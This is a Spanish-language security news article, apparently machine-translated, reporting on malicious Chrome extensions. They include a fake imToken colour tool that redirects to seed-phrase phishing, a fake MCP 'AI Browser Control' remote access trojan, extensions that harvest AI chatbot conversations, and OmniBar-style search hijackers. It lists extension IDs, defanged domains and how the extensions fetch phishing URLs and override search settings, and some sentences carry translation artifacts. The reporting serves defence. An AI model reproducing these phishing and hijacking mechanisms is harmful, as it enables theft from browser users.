«A escala, esta actividad convierte una extensión de productividad aparentemente confiable en un mecanismo de recopilación de datos persistente integrado en el uso cotidiano del navegador empresarial, lo que destaca el creciente riesgo que representan las extensiones del navegador en entornos corporativos», dijo el equipo de investigación de seguridad de Microsoft Defender. dicho.

En las últimas semanas, los cazadores de amenazas también han detectado una extensión maliciosa de Chrome llamada lmΤoken Chromophore (ID: bbhaganppipihlhjgaaeeeefbaoihcgi) que se hace pasar por imToken mientras se anuncia como un visualizador de colores hexadecimales en Chrome Web Store para robar frases iniciales de criptomonedas mediante redirecciones de phishing.

«En lugar de proporcionar la herramienta inofensiva que promete, la extensión abre automáticamente un sitio de phishing controlado por un actor de amenazas tan pronto como se instala, y nuevamente cada vez que el usuario hace clic en él», dijo el investigador de Socket Kirill Boychenko. dicho.

«Durante la instalación, la extensión obtiene una URL de destino desde un punto final JSONKeeper codificado (jsonkeeper[.]com/b/KUWNE) y abre una pestaña que apunta a un dominio similar al estilo Chrome Web Store, chromewedbstorre-detail-extension[.]com. La página de inicio se hace pasar por imToken utilizando homoglifos de escritura mixta y canaliza a las víctimas hacia flujos de captura de credenciales que solicitan una frase inicial de 12 o 24 palabras o una clave privada».

Otras extensiones maliciosas marcado por Palo Alto Networks Se ha descubierto que la Unidad 42 de Networks participa en secuestro de afiliados y exfiltración de datos, uno de ellos: Chrome MCP Server – AI Browser Control (ID: fpeabamapgecnidibdmjoepaiehokgda) – servicio como un troyano de acceso remoto completo mientras se hace pasar por una herramienta de automatización de inteligencia artificial que utiliza el protocolo de contexto modelo (MCP).

Los investigadores de Unit 42 también han revelado que tres extensiones populares de Chrome, a saber, Urban VPN Proxy, Urban Browser Guard y Urban Ad Blocker, que fueron identificadas por Koi como extractoras de conversaciones de IA de varios chatbots como OpenAI ChatGPT, Anthropic Claude, Microsoft Copilot, DeepSeek, Google Gemini, xAI Grok, Meta AI y Perplexity, han regresado a Chrome Web Store.

«Tras la divulgación pública de la campaña el 15 de diciembre de 2025, el desarrollador actualizó las versiones benignas en enero de 2026, probablemente en respuesta al informe», afirman los investigadores Qinge Xie, Nabeel Mohamed, Shresta Bellary Seetharam, Fang Liu, Billy Melicher y Alex Starov. dicho.

Además, la empresa de ciberseguridad identificó una extensión denominada Palette Creator (ID: iofmialeiddolmdlkbheakaefefkjokp), que cuenta con más de 100.000 usuarios y cuya versión anterior se comunicaba con conocidos indicadores de red asociados a una campaña denominada RedDirection para realizar secuestro de navegador.

Eso no es todo. Una nueva campaña que comprende Se ha descubierto que más de 30.000 dominios inician una cadena de redireccionamiento para dirigir el tráfico a una página de destino («algoritmo ansible[.]com») que se utiliza para distribuir una extensión de Chrome llamada OmniBar AI Chat and Search (ID: ajfanjhcdgaohcbphpaceglgpgaaohod).

La extensión utiliza la API chrome_settings_overrides para modificar la configuración de Chrome y configurar la página de inicio del navegador en omnibar.[.]ai, además de convertir el proveedor de búsqueda predeterminado en una URL personalizada: «go.omnibar[.]ai/?api=omni&sub1=omnibar.ai&q={searchTerms}​» y realizar un seguimiento de las consultas a través de un parámetro API.

Se cree que el objetivo final es realizar un secuestro de navegador como parte de lo que parece ser un plan de marketing de afiliación a gran escala, dijo Unit 42, añadiendo que identificó otras dos extensiones que exhiben el mismo comportamiento de secuestro de navegador consistente con OmniBar a través de la anulación de la página de inicio y la interceptación de búsqueda.

• Herramienta de algoritmo de salida de IA (ID: eeoonfhmbjlmienmmbgapfloddpmoalh)
• Extensión oficial de Serpey.com (ID: hokdpdlchkgcenfpiibjjfkfmleoknkp)

Una investigación más profunda de tres extensiones más publicadas por el mismo desarrollador («jon@status77.com» y Status 77) ha descubierto que dos de ellas rastrean la actividad de navegación del usuario para inyectar marcadores de afiliados, mientras que una tercera extrae y transmite hilos de comentarios de Reddit del usuario a un punto final API controlado por el desarrollador.

• Care.Sale (ID: jaioobipjdejpeckgojiojjahmkiaihp)
• Extensión oficial de cupones gigantes (ID: akdajpomgjgldidenledjjiemgkjcchc)
• Consenso: resumen de comentarios de Reddit (ID: mkkfklcadlnkhgapjeejemflhamcdjld)

Se recomienda a los usuarios que hayan instalado cualquiera de las extensiones antes mencionadas que las eliminen de sus navegadores con efecto inmediato, eviten la carga lateral o la instalación de extensiones de productividad no verificadas y auditen los navegadores en busca de extensiones desconocidas y las desinstalen.